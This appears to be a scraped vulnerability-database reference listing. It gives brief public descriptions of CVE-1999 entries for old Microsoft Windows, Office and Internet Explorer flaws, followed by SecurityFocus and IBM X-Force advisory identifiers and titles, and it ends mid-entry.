[CVE-1999-1164] Microsoft Outlook client allows remote attackers to cause a denial of service by sending multiple email messages with the same X-UIDL headers, which causes Outlook to hang. [CVE-1999-1157] Tcpip.sys in Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service via an ICMP Subnet Mask Address Request packet, when certain multiple IP addresses are bound to the same network interface. [CVE-1999-1133] HP-UX 9.x and 10.x running X windows may allow local attackers to gain privileges via (1) vuefile, (2) vuepad, (3) dtfile, or (4) dtpad, which do not authenticate users. [CVE-1999-1132] Windows NT 4.0 allows remote attackers to cause a denial of service (crash) via extra source routing data such as (1) a Routing Information Field (RIF) field with a hop count greater than 7, or (2) a list containing duplicate Token Ring IDs. [CVE-1999-1128] Internet Explorer 3.01 on Windows 95 allows remote malicious web sites to execute arbitrary commands via a .isp file, which is automatically downloaded and executed without prompting the user. [CVE-1999-1127] Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability. [CVE-1999-1110] Windows Media Player ActiveX object as used in Internet Explorer 5.0 returns a specific error code when a file does not exist, which allows remote malicious web sites to determine the existence of files on the client. [CVE-1999-1105] Windows 95, when Remote Administration and File Sharing for NetWare Networks is enabled, creates a share (C$) when an administrator logs in remotely, which allows remote attackers to read arbitrary files by mapping the network drive. [CVE-1999-1104] Windows 95 uses weak encryption for the password list (.pwl) file used when password caching is enabled, which allows local users to gain privileges by decrypting the passwords. [CVE-1999-1097] Microsoft NetMeeting 2.1 allows one client to read the contents of another client's clipboard via a CTRL-C in the chat box when the box is empty. [CVE-1999-1065] Palm Pilot HotSync Manager 3.0.4 in Windows 98 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long string to port 14238 while the manager is in network mode. [CVE-1999-1055] Microsoft Excel 97 does not warn the user before executing worksheet functions, which could allow attackers to execute arbitrary commands by using the CALL function to execute a malicious DLL, aka the Excel "CALL Vulnerability." [CVE-1999-1052] Microsoft FrontPage stores form results in a default location in /_private/form_results.txt, which is world-readable and accessible in the document root, which allows remote attackers to read possibly sensitive information submitted by other users. [CVE-1999-1043] Microsoft Exchange Server 5.5 and 5.0 does not properly handle (1) malformed NNTP data, or (2) malformed SMTP data, which allows remote attackers to cause a denial of service (application error). [CVE-1999-1033] Microsoft Outlook Express before 4.72.3612.1700 allows a malicious user to send a message that contains a .., which can inadvertently cause Outlook to re-enter POP3 command mode and cause the POP3 session to hang. [CVE-1999-1016] Microsoft HTML control as used in (1) Internet Explorer 5.0, (2) FrontPage Express, (3) Outlook Express 5, and (4) Eudora, and possibly others, allows remote malicious web site or HTML emails to cause a denial of service (100% CPU consumption) via large HTML form fields such as text inputs in a table cell. [CVE-1999-1011] The Remote Data Service (RDS) DataFactory component of Microsoft Data Access Components (MDAC) in IIS 3.x and 4.x exposes unsafe methods, which allows remote attackers to execute arbitrary commands. [CVE-1999-0999] Microsoft SQL 7.0 server allows a remote attacker to cause a denial of service via a malformed TDS packet. [CVE-1999-0995] Windows NT Local Security Authority (LSA) allows remote attackers to cause a denial of service via malformed arguments to the LsaLookupSids function which looks up the SID, aka "Malformed Security Identifier Request." [CVE-1999-0994] Windows NT with SYSKEY reuses the keystream that is used for encrypting SAM password hashes, allowing an attacker to crack passwords. [CVE-1999-0993] Modifications to ACLs (Access Control Lists) in Microsoft Exchange 5.5 do not take effect until the directory store cache is refreshed. [CVE-1999-0987] Windows NT does not properly download a system policy if the domain user logs into the domain with a space at the end of the domain name. [CVE-1999-0980] Windows NT Service Control Manager (SCM) allows remote attackers to cause a denial of service via a malformed argument in a resource enumeration request. [CVE-1999-0975] The Windows help system can allow a local user to execute commands as another user by editing a table of contents metafile with a .CNT extension and modifying the topic action to include the commands to be executed when the .hlp file is accessed. [CVE-1999-0969] The Windows NT RPC service allows remote attackers to conduct a denial of service using spoofed malformed RPC packets which generate an error message that is sent to the spoofed host, potentially setting up a loop, aka Snork. [CVE-1999-0967] Buffer overflow in the HTML library used by Internet Explorer, Outlook Express, and Windows Explorer via the res: local resource protocol. [CVE-1999-0945] Buffer overflow in Internet Mail Service (IMS) for Microsoft Exchange 5.5 and 5.0 allows remote attackers to conduct a denial of service via AUTH or AUTHINFO commands. [CVE-1999-0918] Denial of service in various Windows systems via malformed, fragmented IGMP packets. [CVE-1999-0910] Microsoft Site Server and Commercial Internet System (MCIS) do not set an expiration for a cookie, which could then be cached by a proxy and inadvertently used by a different user. [CVE-1999-0909] Multihomed Windows systems allow a remote attacker to bypass IP source routing restrictions via a malformed packet with IP options, aka the "Spoofed Route Pointer" vulnerability. [CVE-1999-0899] The Windows NT 4.0 print spooler allows a local user to execute arbitrary commands due to inappropriate permissions that allow the user to specify an alternate print provider. [CVE-1999-0898] Buffer overflows in Windows NT 4.0 print spooler allow remote attackers to gain privileges or cause a denial of service via a malformed spooler request. [CVE-1999-0886] The security descriptor for RASMAN allows users to point to an alternate location via the Windows NT Service Control Manager. [CVE-1999-0839] Windows NT Task Scheduler installed with Internet Explorer 5 allows a user to gain privileges by modifying the job after it has been scheduled. [CVE-1999-0824] A Windows NT user can use SUBST to map a drive letter to a folder, which is not unmapped after the user logs off, potentially allowing that user to modify the location of folders accessed by later users. [CVE-1999-0815] Memory leak in SNMP agent in Windows NT 4.0 before SP5 allows remote attackers to conduct a denial of service (memory exhaustion) via a large number of queries. [CVE-1999-0794] Microsoft Excel does not warn a user when a macro is present in a Symbolic Link (SYLK) format file. [CVE-1999-0766] The Microsoft Java Virtual Machine allows a malicious Java applet to execute arbitrary commands outside of the sandbox environment. [CVE-1999-0755] Windows NT RRAS and RAS clients cache a user's password even if the user has not selected the "Save password" option. [CVE-1999-0728] A Windows NT user can disable the keyboard or mouse by directly calling the IOCTLs which control them. [CVE-1999-0726] An attacker can conduct a denial of service in Windows NT by executing a program with a malformed file image header. [CVE-1999-0723] The Windows NT Client Server Runtime Subsystem (CSRSS) can be subjected to a denial of service when all worker threads are waiting for user input. [CVE-1999-0721] Denial of service in Windows NT Local Security Authority (LSA) through a malformed LSA request. [CVE-1999-0718] IBM GINA, when used for OS/2 domain authentication of Windows NT users, allows local users to gain administrator privileges by changing the GroupMapping registry key. [CVE-1999-0717] A remote attacker can disable the virus warning mechanism in Microsoft Excel 97. [CVE-1999-0716] Buffer overflow in Windows NT 4.0 help file utility via a malformed help file. [CVE-1999-0701] After an unattended installation of Windows NT 4.0, an installation file could include sensitive information such as the local Administrator password. [CVE-1999-0700] Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file. [CVE-1999-0682] Microsoft Exchange 5.5 allows a remote attacker to relay email (i.e. spam) using encapsulated SMTP addresses, even if the anti-relaying features are enabled. [CVE-1999-0680] Windows NT Terminal Server performs extra work when a client opens a new connection but before it is authenticated, allowing for a denial of service. [CVE-1999-0665] An application-critical Windows NT registry key has an inappropriate value. [CVE-1999-0664] An application-critical Windows NT registry key has inappropriate permissions. [CVE-1999-0611] A system-critical Windows NT registry key has an inappropriate value. [CVE-1999-0603] In Windows NT, an inappropriate user is a member of a group, e.g. Administrator, Backup Operators, Domain Admins, Domain Guests, Power Users, Print Operators, Replicators, System Operators, etc. [CVE-1999-0597] A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire. [CVE-1999-0596] A Windows NT log file has an inappropriate maximum size or retention period. [CVE-1999-0595] A Windows NT system does not clear the system page file during shutdown, which might allow sensitive information to be recorded. [CVE-1999-0594] A Windows NT system does not restrict access to removable media drives such as a floppy disk drive or CDROM drive. [CVE-1999-0593] The default setting for the Winlogon key entry ShutdownWithoutLogon in Windows NT allows users with physical access to shut down a Windows NT system without logging in. [CVE-1999-0592] The Logon box of a Windows NT system displays the name of the last user who logged in. [CVE-1999-0591] An event log in Windows NT has inappropriate access permissions. [CVE-1999-0589] A system-critical Windows NT registry key has inappropriate permissions. [CVE-1999-0585] A Windows NT administrator account has the default name of Administrator. [CVE-1999-0584] A Windows NT file system is not NTFS. [CVE-1999-0583] There is a one-way or two-way trust relationship between Windows NT domains. [CVE-1999-0582] A Windows NT account policy has inappropriate, security-critical settings for lockout, e.g. lockout duration, lockout after bad logon attempts, etc. [CVE-1999-0581] The HKEY_CLASSES_ROOT key in a Windows NT system has inappropriate, system-critical permissions. [CVE-1999-0580] The HKEY_LOCAL_MACHINE key in a Windows NT system has inappropriate, system-critical permissions. [CVE-1999-0579] A Windows NT system's registry audit policy does not log an event success or failure for non-critical registry keys. [CVE-1999-0578] A Windows NT system's registry audit policy does not log an event success or failure for security-critical registry keys. [CVE-1999-0577] A Windows NT system's file audit policy does not log an event success or failure for non-critical files or directories. [CVE-1999-0576] A Windows NT system's file audit policy does not log an event success or failure for security-critical files or directories. [CVE-1999-0575] A Windows NT system's user audit policy does not log an event success or failure, e.g. for Logon and Logoff, File and Object Access, Use of User Rights, User and Group Management, Security Policy Changes, Restart, Shutdown, and System, and Process Tracking. [CVE-1999-0572] .reg files are associated with the Windows NT registry editor (regedit), making the registry susceptible to Trojan Horse attacks. [CVE-1999-0570] Windows NT is not using a password filter utility, e.g. PASSFILT.DLL. [CVE-1999-0562] The registry in Windows NT can be accessed remotely by users who are not administrators. [CVE-1999-0560] A system-critical Windows NT file or directory has inappropriate permissions. [CVE-1999-0549] Windows NT automatically logs in an administrator upon rebooting. [CVE-1999-0546] The Windows NT guest account is enabled. [CVE-1999-0535] A Windows NT account policy for passwords has inappropriate, security-critical settings, e.g. for password length, password age, or uniqueness. [CVE-1999-0534] A Windows NT user has inappropriate rights or privileges, e.g. Act as System, Add Workstation, Backup, Change System Time, Create Pagefile, Create Permanent Object, Create Token Name, Debug, Generate Security Audit, Increase Priority, Increase Quota, Load Driver, Lock Memory, Profile Single Process, Remote Shutdown, Replace Process Token, Restore, System Environment, Take Ownership, or Unsolicited Input. [CVE-1999-0506] A Windows NT domain user or administrator account has a default, null, blank, or missing password. [CVE-1999-0505] A Windows NT domain user or administrator account has a guessable password. [CVE-1999-0504] A Windows NT local user or administrator account has a default, null, blank, or missing password. [CVE-1999-0503] A Windows NT local user or administrator account has a guessable password. [CVE-1999-0496] A Windows NT 4.0 user can gain administrative rights by forcing NtOpenProcessToken to succeed regardless of the user's permissions, aka GetAdmin. [CVE-1999-0468] Internet Explorer 5.0 allows a remote server to read arbitrary files on the client's file system using the Microsoft Scriptlet Component. [CVE-1999-0444] Remote attackers can perform a denial of service in Windows machines using malicious ARP packets, forcing a message box display for each packet or filling up log files. [CVE-1999-0419] When the Microsoft SMTP service attempts to send a message to a server and receives a 4xx error code, it quickly and repeatedly attempts to redeliver the message, causing a denial of service. [CVE-1999-0404] Buffer overflow in the Mail-Max SMTP server for Windows systems allows remote command execution. [CVE-1999-0391] The cryptographic challenge of SMB authentication in Windows 95 and Windows 98 can be reused, allowing an attacker to replay the response and impersonate a user. [CVE-1999-0387] A legacy credential caching mechanism used in Windows 95 and Windows 98 systems allows attackers to read plaintext network passwords. [CVE-1999-0382] The screen saver in Windows NT does not verify that its security context has been changed properly, allowing attackers to run programs with elevated privileges. [CVE-1999-0379] Microsoft Taskpads allows remote web sites to execute commands on the visiting user's machine via certain methods that are marked as Safe for Scripting. [CVE-1999-0376] Local users in Windows NT can obtain administrator privileges by changing the KnownDLLs list to reference malicious programs. [CVE-1999-0369] The Sun sdtcm_convert calendar utility for OpenWindows has a buffer overflow which can gain root access. [CVE-1999-0366] In some cases, Service Pack 4 for Windows NT 4.0 can allow access to network shares using a blank password, through a problem with a null NT hash value. [CVE-1999-0364] Microsoft Access 97 stores a database password as plaintext in a foreign mdb, allowing access to data. [CVE-1999-0357] Windows 98 and other operating systems allows remote attackers to cause a denial of service via crafted "oshare" packets, possibly involving invalid fragmentation offsets. [CVE-1999-0345] Jolt ICMP attack causes a denial of service in Windows 95 and Windows NT systems. [CVE-1999-0285] Denial of service in telnet from the Windows NT Resource Kit, by opening then immediately closing a connection. [CVE-1999-0280] Remote command execution in Microsoft Internet Explorer using .lnk and .url files. [CVE-1999-0275] Denial of service in Windows NT DNS servers by flooding port 53 with too many characters. [CVE-1999-0274] Denial of service in Windows NT DNS servers through malicious packet which contains a response to a query that wasn't made. [CVE-1999-0249] Windows NT RSHSVC program allows remote users to execute arbitrary commands. [CVE-1999-0241] Guessable magic cookies in X Windows allows remote attackers to execute commands, e.g. through xterm. [CVE-1999-0229] Denial of service in Windows NT IIS server using ..\.. [CVE-1999-0228] Denial of service in RPCSS.EXE program (RPC Locator) in Windows NT. [CVE-1999-0227] Access violation in LSASS.EXE (LSA/LSARPC) program in Windows NT allows a denial of service. [CVE-1999-0226] Windows NT TCP/IP processes fragmented IP packets improperly, causing a denial of service. [CVE-1999-0225] Windows NT 4.0 allows remote attackers to cause a denial of service via a malformed SMB logon request in which the actual data size does not match the specified size. [CVE-1999-0224] Denial of service in Windows NT messenger service through a long username. [CVE-1999-0200] Windows NT FTP server (WFTP) with the guest account enabled without a password allows an attacker to log into the FTP server using any username and password. [CVE-1999-0179] Windows NT crashes or locks up when a Samba client executes a "cd .." command on a file share. [CVE-1999-0158] Cisco PIX firewall manager (PFM) on Windows NT allows attackers to connect to port 8080 on the PFM server and retrieve any file whose name and location is known. [CVE-1999-0153] Windows 95/NT out of band (OOB) data denial of service through NETBIOS port, aka WinNuke. [CVE-1999-0119] Windows NT 4.0 beta allows users to read and delete shares. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78861] Microsoft Windows Kerberos denial of service [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows 